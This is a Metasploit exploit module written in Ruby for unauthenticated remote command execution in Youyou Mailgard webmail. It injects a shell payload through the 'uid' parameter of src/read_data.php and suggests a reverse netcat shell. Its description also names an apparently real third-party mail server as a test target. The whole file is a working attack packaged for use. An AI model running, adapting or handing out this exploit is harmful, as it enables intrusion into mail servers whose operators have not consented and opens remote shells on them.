require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
                      'Name' => '佑友mailgard webmail命令执行',
                      'Description' => %q{
                            src/read_data.php,无需登录等认证即可执行任意系统命令, 测试地址: http://mail.szbestman.com:889   cmd/unix/reverse_netcat
      },
                      'Author' =>
                          [
                              '	路人甲',
                              '扶摇直上打飞机'
                          ],
                      'License' => MSF_LICENSE,
                      'References' =>
                          [
                              ['url', 'http://www.wooyun.org/bugs/wooyun-2010-0104770']
                          ],
                      'Privileged' => true,
                      'Platform' => ['unix'],
                      'Targets' => [['all of them', {}],],
                      'Arch' => ARCH_CMD,
                      'DefaultTarget' => 0,
          ))
    register_options(
        [
            Opt::RHOST(),
            Opt::RPORT(889),
            OptString.new('TARGETURI', [true, 'The URI of the Centreon Application', '/']),
        ], self.class)
  end

  def post_payload
    print_status("start to exploit ....")

    res = send_request_cgi(
        {
            'method' => 'GET',
            'uri' => normalize_uri(target_uri.path, 'src', 'read_data.php'),
            'headers' =>
                {
                    "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0",
                },
            'vars_get' =>
                {
                    'sd' => '1',
                    'uid' => ";$(#{payload.encoded})",
                    'action' => '1',
                    'file_name' => '',
                    'user' => '',
                }
        }, 4)
  end

  def exploit
    post_payload
  end

  def rhost
    datastore['RHOST']
  end

  def rport
    datastore['RPORT']
  end

  def targeturi
    datastore['TARGETURI']
  end

end
